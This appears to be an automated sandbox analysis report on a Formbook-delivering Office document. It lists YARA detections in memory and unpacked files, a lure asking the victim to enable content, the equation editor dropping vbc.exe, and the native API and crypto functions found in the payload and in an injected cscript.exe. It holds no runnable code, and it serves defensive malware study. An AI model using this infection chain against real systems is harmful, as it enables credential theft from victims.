Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: document is protected 16 17 ~ 18 19 20 21 22 Open the document in If thts document was 23 Mi
Source: Screenshot number: 4 Screenshot OCR: protected documents the yellow bar above )1 " F' 0 32 0 0 33 34 35 0 0 36
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00500970 4_2_00500970
Source: C:\Users\Public\vbc.exe Code function: 4_2_00509BD0 4_2_00509BD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00500BC0 4_2_00500BC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00509BC0 4_2_00509BC0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00500BB1 4_2_00500BB1
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C0E1 5_2_0041C0E1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C985 5_2_0041C985
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BA8F 5_2_0041BA8F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C37B 5_2_0041C37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CBED 5_2_0041CBED
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C45D 5_2_0041C45D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C8B 5_2_00408C8B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C90 5_2_00408C90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D88 5_2_00402D88
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C75C 5_2_0041C75C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C905A 5_2_007C905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B3040 5_2_007B3040
Source: C:\Users\Public\vbc.exe Code function: 5_2_007DD005 5_2_007DD005
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AE0C6 5_2_007AE0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AE2E9 5_2_007AE2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_00851238 5_2_00851238
Source: C:\Users\Public\vbc.exe Code function: 5_2_007FA37B 5_2_007FA37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B7353 5_2_007B7353
Source: C:\Users\Public\vbc.exe Code function: 5_2_008563BF 5_2_008563BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B2305 5_2_007B2305
Source: C:\Users\Public\vbc.exe Code function: 5_2_007D63DB 5_2_007D63DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_007AF3CF 5_2_007AF3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_007ED47D 5_2_007ED47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083443E 5_2_0083443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_007C1489 5_2_007C1489
Source: C:\Users\Public\vbc.exe Code function: 5_2_007E5485 5_2_007E5485
Source: C:\Users\Public\vbc.exe Code function: 5_2_007F6540 5_2_007F6540
Source: C:\Users\Public\vbc.exe Code function: 5_2_007B351F 5_2_007B351F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B1238 7_2_026B1238
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260E2E9 7_2_0260E2E9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0265A37B 7_2_0265A37B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02617353 7_2_02617353
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02612305 7_2_02612305
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260F3CF 7_2_0260F3CF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026363DB 7_2_026363DB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B63BF 7_2_026B63BF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02613040 7_2_02613040
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0262905A 7_2_0262905A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0263D005 7_2_0263D005
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260E0C6 7_2_0260E0C6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B2622 7_2_026B2622
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0265A634 7_2_0265A634
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261E6C1 7_2_0261E6C1
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02614680 7_2_02614680
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026457C3 7_2_026457C3
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261C7BC 7_2_0261C7BC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0269579A 7_2_0269579A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0264D47D 7_2_0264D47D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02645485 7_2_02645485
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02621489 7_2_02621489
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02656540 7_2_02656540
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261351F 7_2_0261351F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0262C5F0 7_2_0262C5F0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026C3A83 7_2_026C3A83
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02637B00 7_2_02637B00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0269DBDA 7_2_0269DBDA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260FBD7 7_2_0260FBD7
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026BCBA4 7_2_026BCBA4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0263286D 7_2_0263286D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261C85C 7_2_0261C85C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026AF8EE 7_2_026AF8EE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02695955 7_2_02695955
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026269FE 7_2_026269FE
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026129B2 7_2_026129B2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026B098E 7_2_026B098E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0262EE4C 7_2_0262EE4C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02642E2F 7_2_02642E2F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0263DF7C 7_2_0263DF7C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02620F3F 7_2_02620F3F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0261CD5B 7_2_0261CD5B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02640D3B 7_2_02640D3B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026AFDDD 7_2_026AFDDD
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C0D9 7_2_0008C0D9
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C45D 7_2_0008C45D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C75C 7_2_0008C75C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C985 7_2_0008C985
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 007F3F92 appears 39 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007ADF5C appears 39 times
Source: C:\Users\Public\vbc.exe Code function: String function: 007F373B appears 74 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0260E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0265373B appears 238 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 02653F92 appears 108 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0267F970 appears 81 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 0260DF5C appears 118 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185F0 NtCreateFile, 5_2_004185F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186A0 NtReadFile, 5_2_004186A0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418720 NtClose, 5_2_00418720
Source: C:\Users\Public\vbc.exe Code function: 5_2_004187D0 NtAllocateVirtualMemory, 5_2_004187D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185EE NtCreateFile, 5_2_004185EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041871C NtClose, 5_2_0041871C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0078 NtResumeThread,LdrInitializeThunk, 5_2_007A0078
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_007A0048
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A00C4 NtCreateFile,LdrInitializeThunk, 5_2_007A00C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A07AC NtCreateMutant,LdrInitializeThunk, 5_2_007A07AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F900 NtReadFile,LdrInitializeThunk, 5_2_0079F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079F9F0 NtClose,LdrInitializeThunk, 5_2_0079F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0079FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0079FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0079FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0079FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0079FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0079FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0079FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0079FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0079FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0079FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0079FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0079FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A0060 NtQuerySection, 5_2_007A0060
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A10D0 NtOpenProcessToken, 5_2_007A10D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A1148 NtOpenThread, 5_2_007A1148
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A010C NtOpenDirectoryObject, 5_2_007A010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_007A01D4 NtSetValueKey, 5_2_007A01D4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026000C4 NtCreateFile,LdrInitializeThunk, 7_2_026000C4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026007AC NtCreateMutant,LdrInitializeThunk, 7_2_026007AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_025FFAD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_025FFAE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_025FFAB8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFB50 NtCreateKey,LdrInitializeThunk, 7_2_025FFB50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_025FFB68
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_025FFBB8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF900 NtReadFile,LdrInitializeThunk, 7_2_025FF900
